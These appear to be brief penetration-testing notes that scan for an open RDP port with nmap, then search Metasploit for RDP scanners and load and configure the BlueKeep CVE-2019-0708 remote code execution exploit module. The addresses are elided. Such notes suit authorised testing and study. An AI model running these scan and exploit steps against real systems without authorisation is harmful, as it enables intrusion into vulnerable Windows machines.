$ sudo nmap -sS -n -v -p3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server
...
msf6 > search type:auxiliary scanner/rdp
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
...
3 auxiliary/scanner/rdp/rdp_scanner . normal No Identify endpoints speaking the Remote Desktop Protocol (RDP)
4 auxiliary/scanner/rdp/ms12_020_check . normal Yes MS12-020 Microsoft Remote Desktop Checker
msf6 > search type:exploit rdp
0 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
..
Eg. Exploit: windows/rdp/cve_2019_0708_bluekeep_rce
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use 0
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost ...
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts ...